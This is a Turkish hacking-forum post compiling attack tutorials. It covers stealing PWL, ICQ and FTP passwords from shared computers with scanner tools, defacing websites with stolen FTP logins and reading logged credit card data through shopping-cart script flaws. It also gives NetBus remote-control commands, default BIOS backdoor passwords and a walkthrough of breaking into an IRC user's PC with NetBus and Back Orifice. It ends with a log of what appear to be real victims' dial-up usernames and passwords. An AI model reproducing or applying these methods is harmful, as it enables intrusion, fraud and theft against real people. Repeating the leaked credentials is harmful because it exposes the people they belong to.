HACKER OO1
HOŞGELDİNİZ HACKEROO1
FORUM : BLOK : SİTEMİZ : =İÇRESİNDE
MÜKEMMEL PAYLAŞIMLAR VARDIR
SİZLERİNDE ARAMIZDA OLMANIZI İSTERİZ,TAMAMEN ÜCRETSİZ OLAN
PAYLAŞIMLAR VE ÜYELİGİMİZ:
KESİNLİKLE SİZLERİN İSTEKLERİNİZ
ÜZERİNE HAZIRLANMIŞ VE TASARLANMIŞTIR
SİTEMİZDE İYİ VAKİT GECİRMENİZ DİLEGİYLE
ADMİN

Dev Arşiv (Arayıpta Bulamadığınız Hiçbirşey Olmıyıcak)

Aşağa gitmek

Dev Arşiv (Arayıpta Bulamadığınız Hiçbirşey Olmıyıcak)

Mesaj tarafından el-perest Bir C.tesi Kas. 20, 2010 8:29 pm

HOUND VE HALLET GIBI SÜPER PROGRAMLAR VASITASIYLA PWL ICQ VE FTP SIFRELERINİ ELE GEÇİRME

GEREKLİ PROGRAMLAR:

HOUND PROGRAM
HALLET PROGRAMI
PWL TOOL PROGRAMI
ICQCRAK PROGRAMI

Evet arkadaşlar daha önce manuel olarak pwl ve ıcq şifrelerinin nasıl ele geçirileceğini anlatmıştık. Manuel yöntemle öğrenmek
çok önemliydi. Çünkü hack olayında ezbere iş yapmak pek iyi değildir olayın mantığını kavramak önemli.
PROGRAMLARI NASIL KULLANIRIZ.
HALLET PROGRAMI: Öncelikle ayarlar bölümünde
kaynak paylaşım c olarak kalacak
hedef dizin pwl dosyalarının bilgisayarımıza kopyalanacağı adres
örnek c dizininde klasör oluşturalım ve adını pwller koyalım.
HEDEF DİZİN: c:\pwller olacaktır.
bu porgramın dosya gönderdiğini ben görmedim sanırım o bölümünde sorun var ama genede yazmak isterseniz göndermek
istediğiniz bir dosya ismi yazabilirsiniz veya aynen kalabilir
ayarlarımızı yaptık
TARAYICI MODUNA GELİYORUZ VE BİR İP ARALIĞI YAZIYORUZ
ÇOK BÜYÜK ARALIKLAR VERMEYİN BİLGİSAYARI KİLİTLEYEBİLİYOR EN FAZLA 15 İP ARALIĞINDA KALSIN
PORT KISMINI 1243 YAZABİLECEĞİMİZ GİBİ 139 DA YAZABİLİRİZ.
YAPILACAK İŞLEMLER BÖLÜMÜNDE HEPSİNİ İŞARETLİYORUZ
VE İŞLEMİ BAŞLATA BASIYORUZ
çok kısa bir zaman dilimi içinde share kullanıma açık bilgisayarlardan bir sürü pwl ıcq nadirde olsa ftp şifrelerini tespit ediyor ve belirlediğimiz klasöre kaydediyor.
HALLET: Hallet Programı için Rx3 programı vasıtasıylo eğer programınız elinizde yoksa indir: download bölümünde essantial de olabilir
My Webpage belirli bir aralığı taratarak share bilgisayarları tespit ediyoruz ve hallet programınının ip bölümüne giriyoruz.
keylogger göndermek isteniyorsa keylogger göndere basıyoruz
keylogger gönderiyor keyloger txt indir dediğimiz zaman gönderdiğimiz keyloggerleri okuyor yanlız karşı pcnin yazmaya ve silmeye karşı güvenliği olmaması gerekir.Hallet programının en önemli özelliklerinden biri dizin görüntüleyle karşı pcye seri bir biçimde dalması yani bilgisayara girer.
PWL İNDİR: Çok kısa bir zaman içinde bütün pwl leri bulur ve
ve kendi klasörüne ip numaralarına göre kopyalar halletin bu özelliği mükemmel. Bulamazsa sesli mesaj verir bulurken daha değişik sesli mesaj verir
FTP indir:karşı pcde varsa ftp şifserelerini bulur ve kopyalar.
İKİ ADET MÜTHİŞ PROGRAM
ŞİFRELERİ PROGRAMLAR KAYDETTİ NASIL AÇACAĞIZ
pwl şifrelerinin üzerine iki kez tıklarsak pwl tool programı hemen önümüze geliyor searchPasswordFast butonuna basıyoruz hoop
bütün şifreler önümüzde. Bu kadar basit.

PEKİ ICQ ŞİFRELERİNİ NASI AÇACAĞIZ
ICQcrack porogramını açıyoruz.En soldaki buton openICQ dadabase ye basıyoruz ıcg şifrelirini c:\pwl ler dosyasına kaydetmiştik hemen c yi arattırıp o dosyayı buluyoruz karşımıza
open file geldi open feledeki ICQ numarasının üzerine tıklıyoruz
aç diyoruz hooppppp ICQ ŞİFRESİ HATTA VE HATTA KULLANDIĞI VERSİYONU KARŞIMIZDA evet arkadaşlar bu programlar vasıtasıyla dial up ve ıcq şifre elde etmek çok kolay
ve kısa bir zaman içinde yüzlerce pwl ve ıcq şifreleri elde edebilirsiniz.
KOLAY GELSİN


HOUND PROGRAMIYLA WEB HACK

hound programı ayarlara geliyoruz
Hedef Dizin:c:\Belgelerim
yazıyoruz diğer hiç bir ayarla oynamıyoruz çarpıya basıp çıkıyoruz.Tarayıcı modunda FTP yi işaretliyoruz
ve yoğun ip aralıklarından birini veriyoruz
mesela Türkiyede en yoğun ip aralığı
195.175.50.1 195.175.255.255
bu ttnet ip aralığırdır siz daha başka iss ip aralıkları taratabilirsiniz. İp tarama bittikten sonra belgelerime bakıyoruz
sm.data diye bir dosya kaydetmişmi. Eğer böyle bir dosya kaydetmişse o dosya [Linkleri görebilmek için üye olun veya giriş yapın.] dosyasıdır.Ve web sitesiyle ilgili
şifreler mevcuttur. Evet sm.data dosyasını bulduk.
Şimdi cuteftp programını download ediyoruz
F4 basıyoruz önümüze import diye bir menü geldi. İmporta tıklıyoruz importtan belgelerime geliyoruz belgelerimdeki sm.datanın üzerine bir kez tıklıyoruz, aç diyoruz aç dediğimiz anda cute ftp programına o siteyle ilgili tüm bilgileri döktü. Site
[Linkleri görebilmek için üye olun veya giriş yapın.] site ftp şifresi. Connecte basıyoruz ve o siteye bağlanıyoruz. İstersek bu siteyi anında hackliyoruz. İstersek
hostunu smartvhois le hostunu bulup ftp şifresini değiştiriyoruz.
ve siteyi istediğimiz biçimde hackliyoruz. Daha önceden kendimize göre hazırladığımız bir index.htm dosyasını siteye yüklüyoruz. Sitenin içeriğini ister siliyoruz ister silmiyoruz. O tamamen sizin insiyatifinize kalmış.
Bu zamana kadar hiç site hacklemedim site hacklemek istiyorum
diyenler için en basit hack yöntemi budur

GENEL WEB HACK YÖNTEMLERİ VE GÜVENLİK YOLLARI


--- Bilgisayar Bilimde Güvenlik Ana Bilim Dalı ---

Yazıma başlamadan önce size bazı gerçeklerden bahsetmek istiyorum. Özellikle gerçekten bilimsel anlamda bilgisayar sektörü ile ilgilenmemişseniz, bu söyleyeceklerim sizin için altın değerinde olacaktır.

1. Kural : Hiçbir Hacker yada Saldırgan, sihirbaz değildir. Bir şekilde var olan bir açık varsa, o saldırgan, bilgi, yetenek, tecrübe ve şans kriterleri ile o açığı bulur ve kullanır. Her saldırganda bu kriterler aynı olmayacağı için bazıları için atak başarısız olur, bazılar için ise atak karşı tafa büyük hasarlar verir.

2. Kural : Tamamiyle güvenli sistem diye birşey yoktur.

3. Kural : Güvenlik işinde garanti yoktur.

Bu kurallar gerçekten altın niteliğinde. Eğer ki bunların doğru olduğunu bilerek düşünürseniz, yaptığınız işlerde ve yapacağınız yorumlarda bir çok şeyi kolayca elde edersiniz.

İnternet ortamı, bir çok bilgisayarın, farklı protokoller üzerinden birbirine bağlandığı, büyük bir paylaşım ağıdır. Bunu söylememin sebebi, satırlarımı doldurmak için değil. Burdaki önemli bir şeyi vurgulamak içindir. Az önceki cümlede “Paylaşım” denilen birşeyden bahsettim. Evet, ineternette bulunan her bilgisayar bir paylaşım içindedir...

Şimdi kısaca internette bir web sitesi için gereken birimlerden bahsedeceğim.

Domian Name: Alan adıdır. Örneğin, [Linkleri görebilmek için üye olun veya giriş yapın.] bir Top-Level domaindir. “Spymastersnake.org” kısmı domainin adıdır. *.org kısmı domainin hangi level olduğunu belirtir. [Linkleri görebilmek için üye olun veya giriş yapın.] kısmı ise, domainin gösterdiği Ipdeki www klasör veya hizmetinin yoludur. Domain Name her zaman bir Ipnin yerini alır. Bu IP ise bir bilgisayara ait olan, ve o bilgisayarın internete erişimini sağlayan numaradır. Her internete bağlanan makinaya verilen ve birbirinden farklı olan bu numaraya, internet protokolü numarası denir.

Host: İnterenete sürekli bağlı olan, belli bir ipsi olan ve içinde internette yayınlanacak dosyaları barındıran, multi-user işletim sistemi barındıran ve farklı kullanıcıların, biribirinden bağımsız kullanabilecekleri bir bilgisayardır. Eğer siz kendi bilgisayarınıza bu işletim sistemlerinden birini kurup, makinanızı ayarlarsanız bu makine sizinki bile olabilir.

Bu makinalarda web sunucusu dediğimiz programlar bulunur. Bu programlar sayesinde sizin herkese paylaşıma açacağınız internette yayınlayacağınız sitenin dosyalarını 80 numaralı port üzerinden yada başka bir port üzerinden web tarayıcılarının okuyabileceği şekilde yayınlanabilir.

Bir web sitesi aldığınızda, aldığınız yer size bir bilgisayarda hesap açar. Bu hesap sizin dosyalarını koyabileceğiniz bir hesaptır. Bu hesap sayesinde size izin verilen şeyleri yapabilirsiniz. Örneğin izin verilen miktarda dosyalarınızı koyabilir, yayınlayabilir veya karşı makinede dosyalarınızı çalıştırabilir, irc server gibi şeyler kurabilirsiniz. Yada şu anda geocities gibi yerlerin yaptığı sadece dosyalarınızı depo edip, yayınlanmasını sağlayabilirsiniz. Yani bu web yayımcılığının en temel ve basit işini yapmış olursunuz.

Ancak web yayımcılığı daha karmaşık ve daha çok şekilde yapılabilmekte. Bunları sağlayan şeylerin başında script dediğimiz, web browserlarından yollanan komutlarla karşı makinada çalışan uygulamalardır. Bir script, sınırlandırılmış bir *.exe uygulaması gibi çalışır. Belli bir yorumlayıcısı vardır ve tüm görevleri bu yorumlayıcı yapar. Scriptte ise bu yorumlayıcının anlayacağı komutlar vardır. Bu yüzden yaptığınız uygulamanın sınırları bu yorumlayıcının yeteneklerine bağlıdır. Bilinen en yaygın yorumlayıcılar ASP, PHP ve Perl yorumlayıcılarıdır.

Aynı şekilde size verilen bir hesapta, bazı normal *.exe uygulamaları yada ortamına göre sadece uygulama çalıştırabilir, bunlarla oyun serverları, chat serverları kurabilirsiniz. Elbette bu aldığınızın hostun yeteneklerine bağlıdır.

Böylece internete bağlı bir bilgisayarı bazı server uygulamaları sayesinde internette bilgi paylaşabilen bir sistem haline getirip, adına web sunucusu yada host demiş oluyoruz. Bir host içinde yüzlerce kullanıcı ve buna bağlı olarak yüzlerce web sitesi barındırabilir. Bunun böyle olması sağlayan şey ise Domain Name Server dediğimiz sistem ve Multi-User dediğimiz, işletim sistemleridir.

Kısaca bilmeyenler için, bir web sitesi için gereken bir server yazılımı ve internete bağlı bir bilgisayar diyebiliriz. Ancak gerçekte durum daha Complex bir haldedir. Bu complex yerleşim ise bu sistemleri iyi bilen kişiler için bazı avantajlar sağlamakta ve başkasının sahip olduğu sistemlere bile onların istemleri dışında hükmetme şansı vermektedir.

Şimdi kısaca şu anda Türkiye’de Hack adı altında dolaşan, insanların Hack ettim diyerek övündüğü basit ve karmaşık olmayan sistemleri açıklamakta. Bunların başlıcaları şunlardır:

1.Mass Scannerlar: En yaygın olanı son dönemde budur. Bazı scannerlar, internetteki ipleri yani bilgisayarları tarayarak, onların paylaşım izni olup olmadığını ve ftp gibi protokolllerinde erişim izinlerine Anonymous kullanıcılara izin verip vermediğini kısa zamanda tarayıp bulan scannerlardır. Netbios ve Vulnerability scanner diye bir kaç türleri vardır. Kullanıcının bilgili biri olması gerekmez. Tek yapacağı ip aralığını girip tarama yapmasıdır. Aynı şekilde scriptlerdeki açıkları ve hataları bulmak hazırlanmış scannerlarda vardır. Bunlarla mesela, internette bulunan Alış-Veriş scriptlerinin bilinen açıkları veya Permission ayarları hatalarıyla kredi kartları bilgilerine ulaşım yapılmaktadır. Oldukça kolay ve basit birşeydir. Bir mass scanner çok iyi Up ve Down stream bağlantıya ihtiyaç duyar. DSL ve Tx bağlantılar biçilmiş kaftandır.


Eğer internette gecede 100-200 site hack ettik yada saatte 1000 site hack ettik gibi şeyler görürseniz, bunların Mass toolarla sadece butonlara basılarak yapıldığını rahatlıkla söyleyebilirsiniz. Özellikle bu hack edilen sitelerin bir ortak yanı olmaz. Diğelim bu 1000 siteyi hack etmiş adama 1 site adresi verseniz onu hack edemediğini görebilirsiniz. Çünkü kendi rastgele belli ip aralıklarını tarayarak bu işi yapmıştır, belki hack edilen sitelerin adını kendi bile daha önceden duymamıştır. Diyelimki sadece Amerikan sitelerini hack edicek biri, Amerikan hostlarının bulunduğu ve bulunabileceği, belli Amerikan IP aralıklarını tarama yapar ve içinde açıkların olduğu siteleri bularak işlemi yapar. Böylece saatte bağlantı hızına göre 1000 Amerikan sitesi hack edebilir. Ancak bu sitelerin çoğu uyduruk kişisel siteler olacaktır yada kendi çabasıyla hosting hizmeti vermeye çalışan deneyimsiz insanların siteleri olacaktır.



Başka bir şekilde de saatte yüzlerce site hack etmek mümkündür. Bunun için atak yapan şahıs, içinde yüzlerce hesabın bulunduğun bir Host’un açığını bulup, Root, Admin konumuna yada yetki düzeyi olacak bir konuma erişmiş ise tüm hesapları kitleyebilir yada hesapların indexlerine erişim varsa, hazırlayacağı ufak bir uygulama ile tüm indexleri değiştirebilir. Diyelim ki permission ayarları yapılmamış ve tüm kullanıcılarının Home klasörleri chmod 777 gibi bir izinle hazırlanmış bir hostta, açacağınız yada alacağınız bir hesapla, bir script yazmanız yada hostun işletim sistemine göre bir uygulama yazmanız sonucunda, tüm klasörlerdeki indexleri değiştirip, sistemi hack edilmiş havasına sokabilirsiniz. Bu işi eğer hostta 1000 site varsa, hepsine yapmış ve aynı anda yüzlercesini hack etmiş olursunuz... Bu verdiğim örnek bile en azından yetenek isteyen bir örnektir ancak yukarıda verilen tool örneği herkesin yapabileceği ve hali hazırda tüm hack sitelerinin kullanıcıların gözünü boyamak ve kendilerini tatmin etmek için kullandıkları yöntemdir. Bilgisayar bilimi hakkında bilgisi olmayan kişiler ise bu insanların arkasından gitmeye çalışmakta ve onların ağlarına düşmektedirler. Unutmayın ki bu iş sihirle yapılmıyor. Size mantığı açıklanmamış hiçbir hack girişimini gerçek sanmayın.



2.Fake Yollarla: Özellikle bedava siteler dağıtan geocities gibi yerlerden sitesi olan kişilerin sitelerini çalmak için kullanılan yöntemdir. Kişinin mail adresine sahte şifre isteyen mailler yollanır yada user’ın hesabında şifreler denenir. Hiç bişey yapamayan lamer siteyi şikayet etmekte bulur çareyi. Eğer User ile bir chat ortamında bağlantısı varsa ona bir Trojan yada Keylogger yollayarak şifreyi almaya çalışır. İnternet kafe gibi ortamlarda user ve oturduğu makineleri takip ederek şifreyi almaya çalışır. Buda çok kullanılan bir yöntem. Her zamanki gibi bilgisayar bilimi ile ilgisi olmayan kişilerin yolu veya karşısındaki user’ı bilgisi az olunca denen yoldur.


3.Script Açıkları: Bilinen scriptlerin açıklarıyla, sistemdeki bir şifreye ulaşarak yapılan yöntemdir. Örneğin bir forum scriptinin admin şifresini ele geçirip, bu şifreyle sistemin diğer yerlerine ulaşıp, forumun anasayfasını değiştirme, şifre FTP şifresiyle aynı ise siteyi ele geçirme gibi, bilinen ve hala kullanılan yöntemlerdir. Bunlar için bir örneği 2001 yılında yazıp yayınladığım kredi kartlarının çalınması ile ilgili bir yazıdan alıntı yaparak vermek istiyorum bu örnek Permission açıkları ile ilgili bölüm içinde geçerlidir.:
“..........İşte Log Kurulumlarından doğan açıklardan çıkan riskler...

Bu yöntemde zor olan tek bir yer var o da CClerin hangi program tarafından alınıp log edildiğini bulmak. Programı bulduktan sonra ise ona bazı parametreler girerek onun log dosyasını bulmak. Zor değil, kolay. Bazı web siteleri bile bu yöntemlerle hack ediliyor. Yapılması gereken şey scripte bazı parametreler girerek istenene ulaşmak.

Şimdi, ilk iş kıytırık ama CC ile alışveriş yapılan bir site bulmak ve bu sitenin CC verilerinin girildiği alana gitmek. Karşınıza CClerin girildiği form alanı gelince kaynağı görüntüleyip, içindeki POST methodunun bulunduğu yere bakın. Diyelim ki şu an zaten çalışan ve aktif olan [Linkleri görebilmek için üye olun veya giriş yapın.] linkini POST verisinin yollanacağı yerde buldunuz. İşte o zaman bu durumda şans dileyip şunları deneyin:

Orda yazan URLyi kopayalaın, eğer URL yerinde "/cgi-local/shopper" yazıyorsa başına sitenin adresini koyun, yani [Linkleri görebilmek için üye olun veya giriş yapın.] daha sonra URLyi browserınızın git çubuğuna yapıştırın. Şimdi LOG'u bulmaya çalışcaz, ilk önce bu adrese şu TAGları ekliycez, [Linkleri görebilmek için üye olun veya giriş yapın.] bu sayede scriptten bir arama yapmasını istiycez. Tabii ki arıycak ama ne? tabii ki ufak bir keyword, arama yapmamızın nedeni, log'u görüntülemek için başka şansımızın olmaması. Çünkü log'u print edecek bir girdi giremiyoruz, bunun için her zaman otomatik print yapan search tagını kullanıyoruz.

Bunun üstüne bir keyword girdisi ve üstüne de aranacak harfleri giriyoruz [Linkleri görebilmek için üye olun veya giriş yapın.] şu an yeye yazdık ve yeye kelimesini aratmaya başladık ama nerde; Bunun için asıl karışık olan kısmı yapıcaz ve yapılan alışverişlerin nerede LOGlandığını bulucaz. İşte bu durumda devreye zeka giriyor ve denemeye başlıyoruz.
[Linkleri görebilmek için üye olun veya giriş yapın.] les.log diyoruz. Burdaki %20 boşluk anlamına, template ise aranacak kütüphane anlamına geliyor ve tabii ki sales.log ise aranacak olan döküman. Deniyoruz ve tabii ki olmuyor çünkü sales.log yok. O zaman devam ediyoruz ve oraya sales.log yerine sale.log yazıyoruz deniyoruz, olmazsa sell.log yazıyoruz, olmazsa order.log yazıyoruz ve tatam, oldu İşte bütün log karşınızda, yada şöyle diyim, bütün log değil yanlızca içinde yeye kelimesi olanlar karşınızda... Yukarda anlatılırken kullanılan taglar değişebilir.

Mesela, ?search=actin yerine ?action=search olabilir. yada direkt ?search de olabilir bunu bilmeyeiz bu yüzen deniycez. Mesela keywords yerine keyword de olabilir. Sonuç URL [Linkleri görebilmek için üye olun veya giriş yapın.] der.log
Şu ana kadar anlattığım Shopper.Cgi için olan açıktı. Birde Cart32.exe gibi windows için hazırlanmış olan scriptin açığı var. Onun hack edilmesi daha kolay.Cart32 kullanan bir sitede [Linkleri görebilmek için üye olun veya giriş yapın.] olarak scripti bulduğunuzda, bunu [Linkleri görebilmek için üye olun veya giriş yapın.] yada OUTPUT.txt olarak girerek CClere ulaşabilirsiniz. Tabii dediğim ORDERS başka bişi de olabilir ama genelde orders dır.

ESSANTİAL NET TOOLS KULLANIMI

Essantial net tools kullanıma açık share bilgisayarlara kolayca girmek te kullanılan bir programdır. Bu tür diğer programlara göre hem daha seri hemde herkes kolaylıkla bu program sayesinde share bilgisayarlara girebilir. Bilgisayarlara girebilmemiz için sadece bu programı download etmemiz yeterli değil. Öncelikle ağ ayarlarımızı yapmamız gerekiyor. Ağ ayarlarının nasıl yapılacağı Hack bölümü Angr ip Scan kullanımı bölümünde resimli ve ayrıntılı bir biçinde açıklandı. Öncelikle Angr ip scan açıklamasındaki ağ ayarlarını resimdeki gibi aynen yapıyoruz.Aşağıdaki resimde görüleceği üzere NB Scan bölümünü seçerek aşağıdaki starting ip adres bölümüne başlangıç ip no.su Ending ip adrez bölümüne ise bitiş ip. nosunu yazıyoruz. Starta basıyoruz ve kullanıma açık ve kapalı bilgisayarlar listelenmeye başlıyor.RS yazan kısımda Yes olanların üzerine tıklıyoruz. No yazanlarla hiç uğraşmıyoruz çünkü kullanım verilmemiştir.Daha sonra sağ tuşa basıyoruz ve Open Computer i seçiyoruz.5 saniyelik bir beklemeden karşı bilgisayarla bağlantı kurulmuş oluyor.




karşı bilgisayarla bağlantı kurulduğunda aşağıdaki resimdeki gibi c d simgeler ekrena gelirse ne ala c nin üzerine iki kez tıklıyoruz ekran donmuş gibi oluyor, açılıncaya kadar beklememiz gerekiyor. Tam kullanım vermiş başlıyoruz bilgi paylaşımına. Hahahahahahaha. nedense canım birden gülmek istedi.

<>

bazı bilgisayarlarda c d dizinleri görünür çift tıkladığınızda karşınıza şifre ekranı gelir, bazılarında hiç bir şey görünmez pc iç şifrelidir. Bazılarında sadece yazıcılara paylaşım vermiştir. Bazılarında sadece mesala mp3 download veya dinleme için izin verilmiş olabilir. Bazılarında bilerek veya bilmeyerek tam yetki verilmiştir. Bizim için önemli olan bilgi paylaşımıdır. Burada verilen bilgiler eğitim amaçlıdır. Zarar vermek size hiç bir şey kazandırmaz. Uyarmak ise çok şey kazandırır. Bilinçsizce bilgisayarını kullanıma açanları lütfen uyarınız. Avrupadaki pc lerin çoğu kullanıma açıktır.Sadece bilgi alışverişinde kullanırlar. Kimse zarar vermekle uğraşmaz. Lütfen bu söylediklerimi dikkate almıyorsanız bu siteyi terkediniz.

COMMVIEW PROGRAMI

]-->

CommView porogramının bir çok özelliği mevcuttur.Kullanımı gayet basit olup hangi sitenin üzerinde açarsanız açın o site hakkında bir çok bilgilere erişebilirsiniz.Örneğin o anda sitenin kullandığı ipadresileri ve portları eğer oyun sitesi üzerinde açtıysanız serverin müsade ettiği sınırlar dahilinde kişilerin konuşmaları, ip numaraları ve daha birçok bilgiye ulaşabilirsiniz.
programı çalıştırmak için filenin altındaki simgeyi tıklayın program çalışmaya başlar. Programda birçok özellik bulunmasına rağmen sizin için daha çokönemli olan kısmı PACKETS bölümüdür . Resimdede görüldüğü gibi TCP/IP lerin üzerinegelerek tıklıyoruz ekrandakilerin tamamını tıklayarak seçiyoruz (seçebildiğimiz kadar) seçtiğimiz kısmınüzerindeyken sağ tuşa tıklıyoruz ekrandaki küçük pencerede görüldüğü gibi saReconstruct TCP sessioun u tıklıyoruz. Programın o an tespit ettiği tüm bilgiler karşımızageliyor.


Resimde de görüldüğü üzere programın tespit ettiği bilgiler hemen ekrana geliyor
TELNETTEN NETBUS KOMUTLARI
Burdaki komutlar Netbus'ı kullanmayı sevmeyenler icin telnetten netbus komutları..Sahsen ben netbus kullanmıyorum..

AppRedir;(path:\filename.exe); İe uzerinden program calistirir. c:\command.com;100

CaptureScreen Ekrandan goruntu alır

DelFile;(filename.exe) Dosya siler

DisableKeys;1;(keys) harfleri iptal eder [kullanıcı klavyeyi kullanamaz]

DisableKeys;0; Klavye tekrar aktif olur

DisableKeys;1;abcdefghijklmnopqrstuvwxyzåäö Harfler kullanılmaz hale gelir

DownloadFile;(path:\filename.exe) istediginiz dosyayi cekersiniz

Eject;1 CD-ROM'u acar

Eject;0 CD-ROM'u kapar

ExitWin;1 Windos'u kapar

GetApps Calısan prg.ları listeler

GetACL Admin Listi verir

GetInfo Info penceresini verir

GetDisks Hardiskindeki dosyaları gosterir

GetSetup Server icin ayarları verir

GetUser Kullanıcı hakkında bilgi verir

GetVolume Sesi acar

KeyClick;1 Key click on

KeyClick;0 Key click off

Listen;1 Start (keyboard) bir nevi keyloger adamın yazdıklarını gorursunuz

Listen;0 Stop listening

Message;(message) Messagebox halinde mesaj yolalrsınız

NewSetup;serverport;1;password;youremail;VICTIMSem ail;smtpserver Sends the new admindata (1.7)

Password;1;any ENTER'a bas ve ServerPwd;yenisifre Passwordu deistirir(1.6)

PlaySound;(file.wav) wav dosyası calar

PortRedir;(listen tcp port);(ip);(destination port) Redirect the specified port

Record;10 = 10 saniyelik ses kaydeder

RemoveServer;1 Server'ı kaldırır

RemoveServer;0 Kaldırmayı iptal eder

ShowImage;(file.exe) Resim gosterir

SendKeys;(words) Mesaj yollar * tusu ile yazdıgınız siler

SendKeys;2;13 Sends ozel tuslar [sag,sol,yukari,asagi]

SetACL;(ip)| Set (admin) access IP`s

SetMousePos;(xpos);(ypos) Mouse'u oynatırsınız

SwapButton;1 Mouse'un tuslarının yerlerini degistirir

SwapButton;0 Mouse'u eski haline getirir

StartApp;(file.exe) Program calıstırır

UploadFile;(file.exe);(size);(destination dir) Dosya yollarsınız

URL;([Linkleri görebilmek için üye olun veya giriş yapın.] yazılan sayfaya gider

BiOS ŞİFRELERİ ve BİOS ŞİFRESİ KIRMAK
BIOS Şifrelerini konusunu biraz araştıracak olursak.. bilmeyenler için Kırılması en zor şifrelerden biridir..
Öncelikle bilmeyenler için söyleyim BIOS Password bilgisayarınız henüz açılma aşamasındayken karşınıza çıkan şifredir. Peki bundan nasıl kurtulacaksınız. Çok kolay.. ama gizli bir iş için yapacaksanız mesela hırsızlık falan.. zaman alacaktır.. önce kasayı açmanız gerekecek daha sonra BIOS pilini kasadan 5dk lığına çekin.. bilgisayarı 5dk sonra çalıştırdığınızda BIOS şifresi sormayacaktır. Yada bazı Boardların BIOSlarındaki özel Jumperlardan yararlanabilirsiniz. Ancak bazende BIOS passwordların Board`un ilk kullanıldığı gibi kalır.. Bilgisayar sahibi şifreyi bildiği için değiştirmez yada değiştirmeyi bilmediği için denemez.. Peki bunların şifreleri nelerdir.
Bu şifreler BIOSun türüne göre değişir ben bazılarını en sık üretilenler sırasına göre verim

AWARD BIOS

alfaromeo
AW
AWARD
AWARD_PS
AWARD_PW
AWARD_HW
AWARD_SW
AWARD PW
AWARD SW
_award
awkward
j64
j256
j262
j322
01322222
589589
589721
HLT
SER
SKY_FOX
Syxz
aLLy
CONCAT
TTPTHA
aPAf
HLT
KDD
ZBAAACA
ZAAADA
ZJAAADC
djonet
AMI BIOS:

AMI
ami
bios
setup
cmos
AMIDECODE
A.M.I.
AMI SW
AMI_SW
BIOS
PASSWORD
HEWITT RAND
Oder
A.M.I.
AMI!SW
AMI?SW
HEWITT RAND
alfarome
efmukl ( işte schoolbusın şifreside burdan çalınmıştır. )

Phoenix:
phoenix
Compaq:
compaq
Tinys:
Tiny
Bazı Diğer BIOS Şifreleri:

LKWPETER
lkwpeter
BIOSTAR
biostar
BIOSSTAR
biosstar
ALFAROME
Syxz
Wodj
PASS
PASSOFF
CONDO
J64
BIOS
SETUP
CMOS
admin
system



KARŞI BİLGİSAYARA GİRME
Bu bolumde, baskalarının bilgisayarına girme ve internet sifrelerini calma olaylarını ogrenicez..
İlk olarak bu olayları gerceklestirmek icin 4 adet programa ihtiyacimiz var..Wingate,
Netbus,Bo, Telnet(her windowsun icinde vardir)..Diger programlari

İlk olarak irc'de kendimize bir kurban secip, ip numarasını alıyoruz (/dns nickname)..
Sonra wingate'i calıstırıyoruz..
"Hostname or Ip" yazan yere kurbanımızın ip numarasını giriyoruz..
"Scan Port" kısmında 23 seklindeki rakamları 12345 yapıyoruz sonra asagıdan
3. secenek olan try to open the port only" i secerek "scan!" butonuna basıyoruz..
"Servers found" kısmında bir kac tane ip yazması lazım sansa bir tanesini secin..
Sonra netbus'ı calıstırıp hostname/ip yazan yere wingateden buldugunuz ipyi yazın..
Sifre isterse telnetten sifreyi kırmamız lazım..Eger sifre istemezse isiniz kolay...
Ben sifre istedi varsayıyorum ve anlatmaya devam...
Telnet her windowsta vardir...Bul (find) dan telnet'i buldurup calıstırın...
Baglana gelip uzaktaki sistem'e tıklayın...
Ana bilgisyar adı: wingatede buldugmuz ipyi yazıyoruz
Baglantı Noktası kısmına ise netbus portu olan 12345 yaziyoruz..baglana tıklıyoruz..
yukarda netbus 1.6 veya 1.7 yazar..
simdi sifreyi kirmak icin

Password;1;123 ServerPwd;cehennem

bu yazıyı pasteliyoruz...ve sifre cehennem oluyor,siz sifreyi
cehennem yerine baska bir seylerde yapabilirsiniz..



Sonra bir daha netbus'a gidiyoruz artık sifre cehennem giriyoruz...Artık adamın bilgisayrındayız..
file manager'a gelerek adama boserve.exe yi yolluyoruz...nereye yolliycagimizi soruyor..
c:\windows yazarak windowsun altina atiyoruz
yolladiktan sonra download ewkranını kapiyoruz..
start program diyoruz...c:\windows\boserve.exe diyoruz...
tamam netbustaki isimizde bitti..

Şimdi Back Orifice'ye geçiyoruz
target hostorta adamın ipsini yazıyoruz..yan tarafada 12345
yan taraftan system passwordsu secip send e basıyoruz ve bingoooo
bu adımda 10un ustunde password varmis..
Bo da dah cok sey yapabilirsiniz ama onlarida sonra anlatirimmm..
bu arada adamdan cikan passler




** 0:Ping host packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
!PONG!1.20!WINDOWS!
------------------------- End of Data -------------------
** 1:System passwords packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
Password cached by system:
index:02(06) len:34(20/52)
Resource: 'crypt_Blizzard_Storm' Password: '›óå‘P'
index:09(19) len:52(41/22)
Resource: '[Linkleri görebilmek için üye olun veya giriş yapın.] directory' Password: ':'
index:13(19) len:50(31/102)
Resource: '[Linkleri görebilmek için üye olun veya giriş yapın.] only' Password: 'burp:burp'
index:25(01) len:28(07/122)
Resource: 'WINDOWS' Password: 'PAKSOYKAROLAû'
index:00(06) len:74(53/122)
Resource: '*Rna\AT&T WorldNet Service@000000@worldnet.attBu mail adresi spam botlara karşı korumalıdır, görebilmek için Javascript açık olmalıdır' Password: 'aaaaaaaaaaaa'
index:04(06) len:68(50/92)
Resource: '*Rna\Microsoft Internet Referral Service\icwsignup' Password: 'icwsignup9,'
index:07(06) len:44(27/82)
Resource: '*Rna\Turk Nokta Net\abaygan' Password: 'need-bob'
index:08(06) len:38(25/52)
Resource: '*Rna\Turk Nokta Net\burak' Password: 'burak'
index:10(06) len:22(14/02)
Resource: '*Rna\sol\amnık' Password: '*'
index:05(06) len:42(27/72)
Resource: '*Rna\Turk Nokta Net\necatit' Password: 'eynesil"'
index:11(06) len:34(19/62)
Resource: '*Rna\Alnet\ersinari' Password: '987199�$'
index:15(06) len:36(21/62)
Resource: '*Rna\Burak\rbayraktar' Password: '963963'
index:16(06) len:42(27/62)
Resource: '*Rna\Bağlantım 5\rbayraktar' Password: '963963.$'
index:17(06) len:36(19/82)
Resource: '*Rna\Burak\r1056700' Password: 'DABmvsVG·('
index:18(06) len:40(19/122)
Resource: '*Rna\Burak\doganalp' Password: 'alpdogan
ß'
index:19(06) len:18(10/02)
Resource: '*Rna\nolur' Password: '$'
index:20(06) len:36(19/82)
Resource: '*Rna\Burak\b1000025' Password: 'ncVCjYFu¬ '
index:06(06) len:32(16/82)
Resource: '*Rna\AİDATA\suen' Password: '68913672$'
